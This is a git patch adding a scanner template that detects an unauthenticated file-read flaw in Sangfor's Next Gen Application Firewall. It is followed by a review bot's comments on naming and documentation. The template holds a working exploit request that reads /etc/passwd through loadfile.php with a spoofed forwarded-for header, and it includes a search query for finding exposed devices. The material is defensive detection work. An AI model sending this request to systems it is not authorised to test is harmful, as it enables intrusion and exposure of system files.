From 22a07ca5832c47c828d913b9d584479799c05b67 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 5 Oct 2023 17:41:00 +0530
Subject: [PATCH] Create sangfor-ngaf-lfi.yaml
---
.../sangfor/sangfor-ngaf-lfi.yaml | 40 +++++++++++++++++++
1 file changed, 40 insertions(+)
create mode 100644 http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml
diff --git a/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml b/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml
new file mode 100644
index 00000000000..88b737607fe
--- /dev/null
+++ b/http/vulnerabilities/sangfor/sangfor-ngaf-lfi.yaml
@@ -0,0 +1,40 @@
+id: sangfor-nextgen-lfi
+
+info:
+ name: Sangfor Next Gen Application Firewall - Arbitary File Read
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ Sangfor Next Gen Application Firewall is susceptible to Local File Inclusion as it does not validate the file parameter.
+ reference:
+ - https://labs.watchtowr.com/yet-more-unauth-remote-command-execution-vulns-in-firewalls-sangfor-edition/
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: title="SANGFOR | NGAF"
+ tags: sangfor,lfi
+
+http:
+ - raw:
+ - |
+ GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
+ Host: {{Hostname}}
+ y-forwarded-for: 127.0.0.1
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: word
+ part: header
+ words:
+ - 'filename="passwd"'
+ - 'application/octet-stream'
+ condition: and
+
+ - type: status
+ status:
+ - 200
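Review bot: The template `id` (`sangfor-nextgen-lfi`) does not match the file name `sangfor-ngaf-lfi.yaml`, which makes findings harder to map back to the template in scan reports and exclusion lists; `id: sangfor-ngaf-lfi` would align them. The `name` field also misspells "Arbitrary" and would read `name: Sangfor Next Gen Application Firewall - Arbitrary File Read`. The `y-forwarded-for` header in the raw request looks like a typo for `x-forwarded-for`; if it is deliberate, as the referenced write-up appears to indicate, a YAML comment above the `raw:` entry or a sentence in `description` saying so would keep a later maintainer from "correcting" it. The request carries no credentials, so the description could also say that the read is unauthenticated, and a `remediation` line pointing to the vendor fix would make a finding actionable for whoever triages it.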